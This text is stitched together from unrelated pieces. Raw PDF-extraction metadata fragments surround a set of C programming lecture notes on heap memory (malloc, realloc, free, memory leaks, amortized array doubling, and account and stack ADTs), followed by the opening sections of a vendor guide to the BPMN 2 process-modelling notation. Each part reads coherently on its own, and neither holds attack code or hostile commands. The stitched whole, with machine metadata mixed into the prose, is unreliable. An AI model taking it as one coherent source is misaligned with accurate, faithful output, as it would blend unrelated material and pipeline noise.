[8936, 8982, null], [8982, 9228, null], [9228, 9800, null], [9800, 10249, null], [10249, 11091, null], [11091, 11146, null], [11146, 12683, null], [12683, 12890, null], [12890, 13403, null], [13403, 16611, null], [16611, 16876, null], [16876, 17440, null], [17440, 17440, null], [17440, 17869, null], [17869, 18321, null], [18321, 18382, null], [18382, 18967, null], [18967, 19237, null], [19237, 19579, null], [19579, 19622, null], [19622, 19696, null], [19696, 19696, null], [19696, 19767, null], [19767, 20421, null], [20421, 20483, null]], "google_gemma-3-12b-it_is_public_document": [[0, 174, true], [174, 1164, null], [1164, 1984, null], [1984, 2074, null], [2074, 2228, null], [2228, 2907, null], [2907, 3220, null], [3220, 3440, null], [3440, 4504, null], [4504, 5211, null], [5211, 5245, null], [5245, 5388, null], [5388, 6028, null], [6028, 6918, null], [6918, 6956, null], [6956, 6990, null], [6990, 7303, null], [7303, 7400, null], [7400, 7915, null], [7915, 8330, null], [8330, 8853, null], [8853, 8936, null], [8936, 8982, null], [8982, 9228, null], [9228, 9800, null], [9800, 10249, null], [10249, 11091, null], [11091, 11146, null], [11146, 12683, null], [12683, 12890, null], [12890, 13403, null], [13403, 16611, null], [16611, 16876, null], [16876, 17440, null], [17440, 17440, null], [17440, 17869, null], [17869, 18321, null], [18321, 18382, null], [18382, 18967, 
null], [18967, 19237, null], [19237, 19579, null], [19579, 19622, null], [19622, 19696, null], [19696, 19696, null], [19696, 19767, null], [19767, 20421, null], [20421, 20483, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20483, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20483, null]], "pdf_page_numbers": [[0, 174, 1], [174, 1164, 2], [1164, 1984, 3], [1984, 2074, 4], [2074, 2228, 5], [2228, 2907, 6], [2907, 3220, 7], [3220, 3440, 8], [3440, 4504, 9], [4504, 5211, 10], [5211, 5245, 11], [5245, 5388, 12], [5388, 6028, 13], [6028, 6918, 14], [6918, 6956, 15], [6956, 6990, 16], [6990, 7303, 17], [7303, 7400, 18], [7400, 7915, 19], [7915, 8330, 20], [8330, 8853, 21], [8853, 8936, 22], [8936, 8982, 23], [8982, 9228, 24], [9228, 9800, 25], [9800, 10249, 26], [10249, 11091, 27], [11091, 11146, 28], [11146, 12683, 29], [12683, 12890, 30], [12890, 13403, 31], [13403, 16611, 32], [16611, 16876, 33], [16876, 17440, 34], [17440, 17440, 35], [17440, 17869, 36], [17869, 18321, 37], [18321, 18382, 38], [18382, 18967, 39], [18967, 19237, 40], [19237, 19579, 41], [19579, 19622, 42], [19622, 19696, 43], [19696, 19696, 44], [19696, 19767, 45], [19767, 20421, 46], [20421, 20483, 47]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20483, 0.11404]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
867d4272177d960450f905778882ddd776e5b530
Dynamic Memory & ADTs in C

Readings: CP:AMA 17.1, 17.2, 17.3, 17.4

The heap

The *heap* is the final section in the C memory model. It can be thought of as a big "pile" (or "pool") of memory that is available to your program.

Memory is **dynamically** "borrowed" from the heap. We call this *allocation*. When the borrowed memory is no longer needed, it can be "returned" and possibly *reused*. We call this *deallocation*. If too much memory has already been allocated, attempts to borrow additional memory fail.

Unfortunately, there is also a *data structure* known as a heap, and the two are unrelated. To avoid confusion, prominent computer scientist Donald Knuth campaigned to use the name "free store" or the "memory pool", but the name "heap" has stuck. A similar problem arises with "the stack" region of memory because there is also a Stack ADT. However, their behaviour is very similar so it is far less confusing.

malloc

The malloc (memory allocation) function obtains memory from the heap dynamically. It is provided in `<stdlib.h>`.

```c
// malloc(s) requests s bytes of memory from the heap
// and returns a pointer to a block of s bytes, or
// NULL if not enough memory is available
// time: O(1) [close enough for this course]
```

For example, if you want enough space for an array of 100 ints:

```c
int *my_array = malloc(100 * sizeof(int));
```

or an array of `n` struct posns:

```c
struct posn *my_posn_array = malloc(n * sizeof(struct posn));
```

You should always use `sizeof` with `malloc` to improve portability and to improve communication. Seashell will allow

```c
int *my_array = malloc(400);
```

instead of

```c
int *my_array = malloc(100 * sizeof(int));
```

but the latter is much better style and is more portable.

Strictly speaking, the type of the `malloc` parameter is `size_t`, which is a special type produced by the `sizeof` operator. `size_t` and `int` are different types of integers. Seashell is mostly forgiving, but in other C environments using an `int` when C expects a `size_t` may generate a warning. The proper `printf` placeholder to print a `size_t` is `%zu`.

The declaration for the `malloc` function is:

```c
void *malloc(size_t s);
```

The return type is a `(void *)` (void pointer), a special pointer that can point at any type.

```c
int *pi = malloc(sizeof(int));
struct posn *pp = malloc(sizeof(struct posn));
```

```c
int main(void) {
  int *arr1 = malloc(10 * sizeof(int));
  int *arr2 = malloc(5 * sizeof(int));
  //...
}
```

An unsuccessful call to `malloc` returns `NULL`. In practice it's good style to check every `malloc` return value and gracefully handle a `NULL` instead of crashing.

```c
int *my_array = malloc(n * sizeof(int));
if (my_array == NULL) {
  printf("Sorry dude, I'm out of memory! I'm exiting....\n");
  exit(EXIT_FAILURE);
}
```

In the "real world" you should always perform this check, but in this course, you do **not** have to check for a `NULL` return value unless instructed otherwise. In these notes, we omit this check to save space.

The heap memory provided by malloc is *uninitialized*.

```c
int *p = malloc(sizeof(int));
printf("the mystery value is: %d\n", *p);
```

Although malloc is very complicated, for the purposes of this course, you can assume that malloc is $O(1)$.

There is also a `calloc` function which essentially calls malloc and then "initializes" the memory by filling it with zeros. `calloc` is $O(n)$, where $n$ is the size of the block.
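For instance, a zero-filled array of `n` ints could be requested with `calloc` (a small sketch, not from the original notes; note that `calloc` takes the element count and the element size as two separate arguments):

```c
int *zeros = calloc(n, sizeof(int));  // every zeros[i] starts at 0
// ... use the array ...
free(zeros);
```

Because `calloc` must zero every byte it hands out, the $O(n)$ cost mentioned above is unavoidable.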
For every block of memory obtained through `malloc`, you must eventually `free` the memory (when the memory is no longer in use).

```c
// free(p) returns memory at p back to the heap
// requires: p must be from a previous malloc
// effects: the memory at p is invalid
// time: O(1)
```

In the Seashell environment, you must `free` every block.

```c
int *my_array = malloc(n * sizeof(int));
// ...
// ...
free(my_array);
```

Invalid after free

Once a block of memory is freed, reading from or writing to that memory is invalid and may cause errors (or unpredictable results). Similarly, it is invalid to free memory that was not returned by a malloc or that has already been freed.

```c
int *p = malloc(sizeof(int));
free(p);
int k = *p;  // INVALID
*p = 42;     // INVALID
free(p);     // INVALID
p = NULL;    // GOOD STYLE
```

Pointer variables may still contain the address of the memory that was freed, so it is often good style to assign NULL to a freed pointer variable.

Memory leaks

A memory leak occurs when allocated memory is not eventually freed. Programs that leak memory may suffer degraded performance or eventually crash.

```c
int *ptr;
ptr = malloc(sizeof(int));
ptr = malloc(sizeof(int));  // Memory Leak!
```

In this example, the address from the original `malloc` has been overwritten. That memory is now "lost" (or leaked) and so it can never be freed.

Garbage collection

Many modern languages (including Racket) have a *garbage collector*. A garbage collector **detects** when memory is no longer in use and **automatically** frees memory and returns it to the heap. One disadvantage of a garbage collector is that it can be slow and affect performance, which is a concern in high performance computing.

Merge sort

In Section 09 we saw a Racket implementation of the divide and conquer algorithm merge sort that is $O(n \log n)$. In merge sort, the data is split into two smaller groups. After each smaller group is sorted, they are merged together. To simplify our C implementation, we will use a merge helper function.

```c
// merge(dest, src1, len1, src2, len2) modifies dest to contain
//   the elements from both src1 and src2 in sorted order
// requires: length of dest is at least (len1 + len2)
//           src1 and src2 are sorted
// effects: modifies dest
// time: O(n), where n is len1 + len2
void merge(int dest[], const int src1[], int len1,
           const int src2[], int len2) {
  int pos1 = 0;
  int pos2 = 0;
  for (int i = 0; i < len1 + len2; ++i) {
    if (pos1 == len1 || (pos2 < len2 && src2[pos2] < src1[pos1])) {
      dest[i] = src2[pos2];
      ++pos2;
    } else {
      dest[i] = src1[pos1];
      ++pos1;
    }
  }
}
```

```c
void merge_sort(int a[], int len) {
  if (len <= 1) return;
  int llen = len / 2;
  int rlen = len - llen;
  int *left = malloc(llen * sizeof(int));
  int *right = malloc(rlen * sizeof(int));
  for (int i = 0; i < llen; ++i) left[i] = a[i];
  for (int i = 0; i < rlen; ++i) right[i] = a[i + llen];
  merge_sort(left, llen);
  merge_sort(right, rlen);
  merge(a, left, llen, right, rlen);
  free(left);
  free(right);
}
```

This implementation of merge sort is also $O(n \log n)$.

Using dynamic (heap) memory, a function can obtain memory that persists after the function has returned.

```c
// build_array(n) returns a new array initialized with values
//   a[0] = 0, a[1] = 1, ..., a[n-1] = n-1
// effects: allocates a heap array (caller must free)
int *build_array(int len) {
  assert(len > 0);
  int *a = malloc(len * sizeof(int));
  for (int i = 0; i < len; ++i) {
    a[i] = i;
  }
  return a;  // array exists beyond function return
}
```

The caller (client) is responsible for freeing the memory (the contract should communicate this).

The `<string.h>` function `strdup` makes a duplicate of a string.

```c
// my_strdup(s) makes a duplicate of s
// effects: allocates memory (caller must free)
char *my_strdup(const char *s) {
  char *newstr = malloc((strlen(s) + 1) * sizeof(char));
  strcpy(newstr, s);
  return newstr;
}
```

Recall that `strcpy(dest, src)` copies the characters from `src` to `dest`, and that the `dest` array must be large enough. When allocating memory for strings, don't forget to include space for the null terminator. `strdup` is not officially part of the C standard, but it is common.

Resizing arrays

Because `malloc` requires the size of the block of memory to be allocated, it does not seem to solve the problem: "What if we do not know the length of an array in advance?" To solve this problem, we can *resize* an array by:
- creating a new array
- copying the items from the old to the new array
- freeing the old array

example: resizing an array

As we will see shortly, this is not how it is done in practice, but this is an illustrative example.

```c
// my_array has a length of 100
int *my_array = malloc(100 * sizeof(int));
// stuff happens...
// oops, my_array now needs to have a length of 101
int *old = my_array;
my_array = malloc(101 * sizeof(int));
for (int i = 0; i < 100; ++i) {
  my_array[i] = old[i];
}
free(old);
```

realloc

To make resizing arrays easier, there is a `realloc` function.

```c
// realloc(p, newsize) resizes the memory block at p
//   to be newsize and returns a pointer to the
//   new location, or NULL if unsuccessful
// requires: p must be from a previous malloc/realloc
// effects: the memory at p is invalid (freed)
// time: O(n), where n is newsize
```

Similar to our previous example, `realloc` preserves the contents from the old array location.

```c
int *my_array = malloc(100 * sizeof(int));
// stuff happens...
my_array = realloc(my_array, 101 * sizeof(int));
```

The pointer returned by `realloc` may actually be the original pointer, depending on the circumstances. Regardless, after `realloc` only the new returned pointer can be used. You should assume that the parameter of `realloc` was freed and is now invalid.

Typically, `realloc` is used to request a larger size and the additional memory is uninitialized. If the size is smaller, the extraneous memory is discarded.

```
realloc(NULL, s) behaves the same as malloc(s).
realloc(ptr, 0) behaves the same as free(ptr).
```

Although rare, in practice,

```c
my_array = realloc(my_array, newsize);
```

could possibly cause a memory leak if an "out of memory" condition occurs. In C99, an unsuccessful `realloc` returns `NULL` and the original memory block is not freed.

```c
// safer use of realloc
int *tmp = realloc(my_array, newsize);
if (tmp) {
  my_array = tmp;
} else {
  // handle out of memory condition
}
```

String I/O: strings of unknown size

In Section 08 we saw how reading in strings can be susceptible to buffer overruns.

```c
char str[81];
int retval = scanf("%s", str);
```

The target array is often oversized to ensure there is capacity to store the string. Unfortunately, regardless of the length of the array, a buffer overrun may occur.
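As an aside (a mitigation not pursued further in these notes), a field width in the conversion bounds how many characters `scanf` will store, which prevents the overrun but silently truncates longer input instead of adapting to it:

```c
char str[81];
// "%80s" stores at most 80 characters plus the null terminator,
// so str cannot overflow; any extra input is left unread.
int retval = scanf("%80s", str);
```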
To solve this problem we can continuously resize (`realloc`) an array while reading in only one character at a time. readstr() reads in a non-whitespace string from I/O or returns NULL if unsuccessful effects: allocates memory (caller must free) ```c char *readstr(void) { char c; if (scanf(" %c", &c) != 1) return NULL; // ignore initial WS int len = 1; char *str = malloc(len * sizeof(char)); str[0] = c; while (1) { if (scanf("%c", &c) != 1) break; if (c == ' ' || c == '\n') break; ++len; str = realloc(str, len * sizeof(char)); str[len - 1] = c; } str = realloc(str, (len + 1) * sizeof(char)); str[len] = '\0'; return str; } ``` Amortized analysis Unfortunately, the running time of `readstr` is $O(n^2)$, where $n$ is the length of the string. This is because `realloc` is $O(n)$ and occurs inside of the loop. A better approach might be to allocate more memory than necessary and only call `realloc` when the array is “full”. A popular strategy is to double the size of the array when it is full. Similar to working with maximum-length arrays, we need to keep track of the “actual” length in addition to the allocated length. char *readstr(void) { char c; if (scanf(" %c", &c) != 1) return NULL; // ignore initial WS int maxlen = 1; int len = 1; char *str = malloc(maxlen * sizeof(char)); str[0] = c; while (1) { if (scanf("%c", &c) != 1) break; if (c == ' ' || c == '\n') break; if (len == maxlen) { maxlen *= 2; str = realloc(str, maxlen * sizeof(char)); } ++len; str[len - 1] = c; } str = realloc(str, (len + 1) * sizeof(char)); str[len] = '\0'; return str; } With our “doubling” strategy, most iterations will be $O(1)$, unless it is necessary to resize (realloc) the array. The resizing time for the first 32 iterations would be: \[2,4,0,8,0,0,0,16,0,0,0,0,0,0,0,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64\] For $n$ iterations, the total resizing time is at most: \[2 + 4 + 8 + \ldots + \frac{n}{4} + \frac{n}{2} + n + 2n = 4n - 2 = O(n).\] By using this doubling strategy, the total run time for readstr is now only $O(n)$. In other words, the amortized (“average”) time for each iteration is: \[O(n)/n = O(1).\] ADTs in C With dynamic memory, we now have the ability to implement an Abstract Data Type (ADT) in C. In Section 02, the first ADT we saw was a simple account ADT, which stored a username and a password. It demonstrated information hiding, which provides both security and flexibility. We will also need to use opaque structures (incomplete declarations without fields), as introduced in Section 06. example: account ADT In the interface, we only provide an incomplete declaration. In addition to the normal operations, we provide functions to create and destroy instances of the ADT. // account.h -- a simple account ADT module struct account; // incomplete // create_account(username, password) creates an account // with the given username and password // effects: allocates memory (client must call destroy_account) struct account *create_account(const char *username, const char *password); // destroy_account(acc) removes all memory for acc // effects: memory at acc is free’d and invalid void destroy_account(struct account *acc); Because the interface only provides an incomplete declaration, the **client** does not know the fields of the **account** structure. The client can only define a **pointer** to the structure, which is **returned** by **create_account**. ```c // client.c #include "account.h" char username[9]; char password[41]; // ... struct account *my_account = create_account(username, password); // ... 
destroy_account(my_account);
```

The complete structure declaration only appears in the implementation.

```c
// account.c
struct account {
  char *uname;
  char *pword;
};
```

`create_account` returns a pointer to a new account.

```c
struct account *create_account(const char *username,
                               const char *password) {
  struct account *a = malloc(sizeof(struct account));
  a->uname = malloc((strlen(username) + 1) * sizeof(char));
  strcpy(a->uname, username);
  a->pword = malloc((strlen(password) + 1) * sizeof(char));
  strcpy(a->pword, password);
  return a;
}
```

It makes duplicates of the username and password strings provided by the client.

In C, our ADT also requires a `destroy_account` to `free` the memory created (both the fields and the structure itself).

```c
void destroy_account(struct account *a) {
  free(a->uname);
  free(a->pword);
  free(a);
}
```

The remaining operations are straightforward.

```c
const char *get_username(const struct account *acc) {
  return acc->uname;
}

bool is_correct_password(const struct account *acc, const char *word) {
  return (strcmp(acc->pword, word) == 0);
}
```

Implementing a Stack ADT

As discussed in Section 02, the account ADT illustrates the principles of an ADT, but it is not a typical ADT. The **Stack ADT** (one of the *Collection ADTs*) is more representative.

The interface is nearly identical to the stack implementation from Section 08 that demonstrated *maximum-length arrays*. The only differences are: it uses an opaque structure, it provides `create` and `destroy` functions, and there is no maximum: it can store an arbitrary number of integers.

```c
// stack.h (INTERFACE)
struct stack;

struct stack *create_stack(void);
bool stack_is_empty(const struct stack *s);
int stack_top(const struct stack *s);
int stack_pop(struct stack *s);
void stack_push(int item, struct stack *s);
void stack_destroy(struct stack *s);
```

The Stack ADT uses the "doubling" strategy.

```c
// stack.c (IMPLEMENTATION)
struct stack {
  int len;
  int maxlen;
  int *data;
};

struct stack *create_stack(void) {
  struct stack *s = malloc(sizeof(struct stack));
  s->len = 0;
  s->maxlen = 1;
  s->data = malloc(s->maxlen * sizeof(int));
  return s;
}
```

The doubling is implemented in push. **destroy** must **free** the field and the structure itself.

```c
// Time: O(1) [amortized]
void stack_push(int item, struct stack *s) {
  assert(s);
  if (s->len == s->maxlen) {
    s->maxlen *= 2;
    s->data = realloc(s->data, s->maxlen * sizeof(int));
  }
  s->data[s->len] = item;
  s->len += 1;
}

void stack_destroy(struct stack *s) {
  free(s->data);
  free(s);
}
```

The remaining operations are identical to the maximum-length implementation.

```c
bool stack_is_empty(const struct stack *s) {
  assert(s);
  return s->len == 0;
}

int stack_top(const struct stack *s) {
  assert(s);
  assert(s->len);
  return s->data[s->len - 1];
}

int stack_pop(struct stack *s) {
  assert(s);
  assert(s->len);
  s->len -= 1;
  return s->data[s->len];
}
```

As discussed earlier, the *amortized* run-time for `push` is $O(1)$. You will use *amortized* analysis in CS 240 and in CS 341.

In this implementation, we never "shrink" the array when items are popped. A popular strategy is to reduce the size when the length reaches $\frac{1}{4}$ of the maximum capacity. Although more complicated, this also has an *amortized* run-time of $O(1)$ for an arbitrary sequence of `pushes` and `pops`. Languages that have a built-in resizable array (*e.g.*, C++'s `vector`) often use a similar "doubling" strategy.
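As an illustration only (this variant is not part of the course code), a pop that also shrinks the backing array might look like the following, reusing the `struct stack` fields defined above; the name `stack_pop_shrink` is made up to avoid clashing with `stack_pop`:

```c
// Sketch: pop that halves maxlen once the stack is only one
// quarter full; still amortized O(1) per operation.
int stack_pop_shrink(struct stack *s) {
  assert(s);
  assert(s->len);
  s->len -= 1;
  int item = s->data[s->len];
  if (s->maxlen > 1 && s->len <= s->maxlen / 4) {
    s->maxlen /= 2;
    s->data = realloc(s->data, s->maxlen * sizeof(int));
  }
  return item;
}
```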
Goals of this Section

At the end of this section, you should be able to:
- describe the heap
- use the functions `malloc`, `realloc` and `free` to interact with the heap
- explain that the heap is finite, and demonstrate how to check that `malloc` succeeds
- describe memory leaks, how they occur, and how to prevent them
- describe the doubling strategy, and how it can be used to manage dynamic arrays to achieve an amortized $O(1)$ run-time for additions
- create dynamic resizable arrays in the heap
- write functions that create and return a new struct
- document dynamic memory side-effects in contracts
{"Source-Url": "https://www.student.cs.uwaterloo.ca/~cs136/handouts/10-dynamic-memory-post.pdf", "len_cl100k_base": 4927, "olmocr-version": "0.1.53", "pdf-total-pages": 44, "total-fallback-pages": 0, "total-input-tokens": 63346, "total-output-tokens": 6834, "length": "2e12", "weborganizer": {"__label__adult": 0.00040221214294433594, "__label__art_design": 0.000263214111328125, "__label__crime_law": 0.0002689361572265625, "__label__education_jobs": 0.000885009765625, "__label__entertainment": 6.502866744995117e-05, "__label__fashion_beauty": 0.00014662742614746094, "__label__finance_business": 0.00010961294174194336, "__label__food_dining": 0.0004627704620361328, "__label__games": 0.0006093978881835938, "__label__hardware": 0.0010709762573242188, "__label__health": 0.0004122257232666016, "__label__history": 0.00021696090698242188, "__label__home_hobbies": 9.888410568237303e-05, "__label__industrial": 0.00040841102600097656, "__label__literature": 0.00024580955505371094, "__label__politics": 0.00020945072174072263, "__label__religion": 0.0005307197570800781, "__label__science_tech": 0.0088348388671875, "__label__social_life": 8.928775787353516e-05, "__label__software": 0.00299835205078125, "__label__software_dev": 0.98046875, "__label__sports_fitness": 0.00032448768615722656, "__label__transportation": 0.0005979537963867188, "__label__travel": 0.0002262592315673828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18609, 0.01195]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18609, 0.86023]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18609, 0.7761]], "google_gemma-3-12b-it_contains_pii": [[0, 68, false], [68, 516, null], [516, 516, null], [516, 929, null], [929, 1477, null], [1477, 1759, null], [1759, 2125, null], [2125, 2389, null], [2389, 2510, null], [2510, 3055, null], [3055, 3504, null], [3504, 3931, null], [3931, 4487, null], [4487, 4887, null], [4887, 5242, null], [5242, 5562, null], [5562, 6202, null], [6202, 6705, null], [6705, 7275, null], [7275, 7866, null], [7866, 8209, null], [8209, 8625, null], [8625, 9200, null], [9200, 9720, null], [9720, 10121, null], [10121, 10582, null], [10582, 11180, null], [11180, 11684, null], [11684, 12237, null], [12237, 12793, null], [12793, 13196, null], [13196, 13871, null], [13871, 14300, null], [14300, 14449, null], [14449, 14965, null], [14965, 15454, null], [15454, 15960, null], [15960, 16239, null], [16239, 16561, null], [16561, 17046, null], [17046, 17444, null], [17444, 17993, null], [17993, 18319, null], [18319, 18609, null]], "google_gemma-3-12b-it_is_public_document": [[0, 68, true], [68, 516, null], [516, 516, null], [516, 929, null], [929, 1477, null], [1477, 1759, null], [1759, 2125, null], [2125, 2389, null], [2389, 2510, null], [2510, 3055, null], [3055, 3504, null], [3504, 3931, null], [3931, 4487, null], [4487, 4887, null], [4887, 5242, null], [5242, 5562, null], [5562, 6202, null], [6202, 6705, null], [6705, 7275, null], [7275, 7866, null], [7866, 8209, null], [8209, 8625, null], [8625, 9200, null], [9200, 9720, null], [9720, 10121, null], [10121, 10582, null], [10582, 11180, null], [11180, 11684, null], [11684, 12237, null], [12237, 12793, null], [12793, 13196, null], [13196, 13871, null], [13871, 14300, null], [14300, 14449, null], [14449, 14965, null], [14965, 15454, null], [15454, 15960, null], [15960, 16239, null], [16239, 16561, null], [16561, 17046, null], [17046, 17444, null], 
[17444, 17993, null], [17993, 18319, null], [18319, 18609, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18609, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18609, null]], "pdf_page_numbers": [[0, 68, 1], [68, 516, 2], [516, 516, 3], [516, 929, 4], [929, 1477, 5], [1477, 1759, 6], [1759, 2125, 7], [2125, 2389, 8], [2389, 2510, 9], [2510, 3055, 10], [3055, 3504, 11], [3504, 3931, 12], [3931, 4487, 13], [4487, 4887, 14], [4887, 5242, 15], [5242, 5562, 16], [5562, 6202, 17], [6202, 6705, 18], [6705, 7275, 19], [7275, 7866, 20], [7866, 8209, 21], [8209, 8625, 22], [8625, 9200, 23], [9200, 9720, 24], [9720, 10121, 25], [10121, 10582, 26], [10582, 11180, 27], [11180, 11684, 28], [11684, 12237, 29], [12237, 12793, 30], [12793, 13196, 31], [13196, 13871, 32], [13871, 14300, 33], [14300, 14449, 34], [14449, 14965, 35], [14965, 15454, 36], [15454, 15960, 37], [15960, 16239, 38], [16239, 16561, 39], [16561, 17046, 40], [17046, 17444, 41], [17444, 17993, 42], [17993, 18319, 43], [18319, 18609, 44]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18609, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
711ea357802d9db80abec9653b5cd622ebe797d9
The Ultimate Guide to BPMN 2 Revised and updated The standard that bridges the needs of IT and business for Business Process Management (BPM) Contents Why BPMN Matters 3 What is BPMN? 4 The ABC’s of BPMN 5 A means for business & technical collaboration 6 The 4 categories of BPMN 7 BPMN in 4 categories 8 Workflow 9 Organizing 10 Readability 11 Special behavior 12 The 3 levels of BPMN complexity 13 BPMN at 3 levels of complexity 14 Basic BPMN 15 An example with basic BPMN 16 Intermediate BPMN 17 Intermediate BPMN: activities 18 Intermediate BPMN: sequence flow 19 Intermediate BPMN: gateways 20 Intermediate BPMN events: catch and throw 21 Intermediate BPMN events: messages and signals 22 Intermediate BPMN events: timers and errors 23 Intermediate BPMN in a process model 24 Summary 25 Sources and further reading 26 Why BPMN Matters Business Process Model and Notation 2.0 (BPMN2) is one of the best things to happen in business process management in a long time. Finally, both the business and technical sides of the organization can share a common language – something that they can both understand and that meets their respective needs for precision and flexibility. This shared language is empowering new ways of working together - and it results in the deployment of new and more flexible applications. At Bonitasoft, the leading provider of open source BPM solutions, we are mindful of the power and potential of shared standards. BPMN 2.0 is a natural fit with what we do. And we believe the benefits can become quickly apparent. In fact, the nice thing about BPMN is that it is so structurally sound that once you master the Basic BPMN level elements, your knowledge and capability will improve quickly; you’ll learn what you need from the intermediate BPMN level elements for extending the model, and the technical team will pick up the advanced BPMN level to complete the execution capability. We offer this Ultimate Guide to help you to get familiar with the basics and give BPMN a try. We are convinced you will find it powerful, adaptable and remarkably easy. Whether you are a business professional or a developer, BPMN2 is your path to better processes, improved management, and more efficiency. Miguel Valdes Faura, Bonitasoft CEO and founder What is **BPMN**? The ABC’s of BPMN If you’ve heard of BPMN but aren’t really sure what it is or what it does, you are not alone. But, before we talk about what BPMN is, let’s talk about what it is not... It is not a “system.” You can’t “buy” a BPMN – it is a standard for business process collaboration and for IT development. It is not just for business or just for IT— it is a shared, common language. It is not only for experts. If you are at all familiar with flow charting, you can dive in immediately. **BPMN = BPM + N** A business process model is a representation of an organization’s processes. A model can be analyzed and improved. **Definitions** **BPM** Business Process Management The discipline of managing processes as the means for improving business performance outcomes¹ **BPMN** Business Process Model and Notation A graphical representation for specifying business processes in a business process model² **BPMS** Business Process Management Suite Application infrastructure to support BPM projects and programs... 
from process discovery, definition and design to implementation, monitoring and analysis, and through ongoing optimization¹ 1 Gartner Research 2 Object Management Group **Notation** consists of graphic symbols to represent action, flow, or behavior of a process. In a BPMS, BPMN notation represents coding instructions that are executable. BPMN provides a notation that can be readily understandable by all users: - from the business analysts who model the processes conceptually, - to the technical developers responsible for implementing the technology for the processes, - to the people who will manage and monitor the processes. See More What is BPM? BPMN provides a way to quickly diagram business functions. Use it to draw a process graphically. The visual model will be translated quickly and easily into software that will run the process. With BPMN, business people can define what they want, simply but with a high degree of precision; and IT professionals can communicate with each other and with business people about the model in a clear, common framework. BPMN works for any kind of management, operation and support process. By developing a model with BPMN, you can collaboratively improve communications with decision makers about the nature and health of a process; you can collaboratively initiate improvements – and you can collaboratively move toward automating those improvements. BPMN may look familiar BPMN has been around for almost a decade and much in BPMN2 remains from the 1.0 version, especially the shapes and symbols. One thing that has changed “behind the scenes” is the adoption of XML interchange format and the support BPMN 2.0 provides for turning a model and its notation into an executable process. Open source and proprietary BPM vendors now have the capacity to take BPMN 2.0 input and turn it into process automation. BPMN is not an execution language. It is designed to be “consumed” by process engines and made into executable processes. source: Business Process Model and Notation, Version 2, January 2011 by OMG The 4 categories of BPMN BPMN in 4 categories The BPMN2 spec is long, dense and relatively complex We can approach it by organizing BPMN elements into a few general categories. With just a few elements from first three categories you can draw a business process diagram and begin to build and understand a process. Let’s look more closely at what they represent. In the BPMN2 spec - 98 visual elements - 508 pages - 300 figures - 313 tables - 3 annexes - 13 collaborating groups <table> <thead> <tr> <th>Workflow</th> <th>Organizing</th> <th>Readability</th> <th>Special behavior</th> </tr> </thead> <tbody> <tr> <td>Activities</td> <td>Pools</td> <td>Annotation</td> <td>Messages</td> </tr> <tr> <td>Events</td> <td>Swimlanes or lanes</td> <td>Links</td> <td>Signals</td> </tr> <tr> <td>Gateways</td> <td></td> <td></td> <td>Timers</td> </tr> <tr> <td>Sequence flow</td> <td></td> <td></td> <td>Errors</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Repeating</td> </tr> </tbody> </table> Workflow Workflow includes activities, gateways, events, and the sequence flow that connects them. Each of these elements have several types, and all of these types can be connected in a sequence. 
**Activities** Tasks that are performed in the process- by humans, by automation, or that activate subprocesses **Events** Used to start or end a process, and to manage specific actions during a workflow; it triggers or is the result of something external of the process flow **Gateways** Used to separate or join process flow **Sequence flow** Used to show how the workflow moves See More Getting Started with BPM The Ultimate Guide to BPMN2 Organizing includes *pools* and *swimlanes*. Think of these as the container for the process flow. **Pool** Contains a single, complete process. Workflow cannot leave a pool - we need to transfer action or data from one pool/process to another using other means. **Swimlane** Used to help organize the process based on who does what. In a lap pool, swimlanes keep the swimmers from crashing into one another. Workflow crosses swimlane boundaries as if they did not exist – they are purely for organizational clarity. Readability includes annotations and links. These elements help make a model readable. They have no effect at all on the actual process flow. Text annotation Allow you to paste notes all over a model with explanations for clarity (a great tool for beginning modelers!) Links Allow you to cut a process that has become too long to read easily, and simply continue the process on another line. Throw link Catch link See More Bonita BPM documentation: Process Modeling Special behavior includes a specific set of events, repeating, and correlation. These elements allow us to design executable workflow that can behave in complex ways. **Messages and message flow** Used to transfer data from one pool/process to another and to correlate related processes **Signals** Used to broadcast information to other process **Timers** Used to launch periodic activities, or to ensure that an activity happens within a specified deadline **Errors** Used to define behavior when the system encounters error **Correlation** Correlation is used to coordinate progress between two running process instances 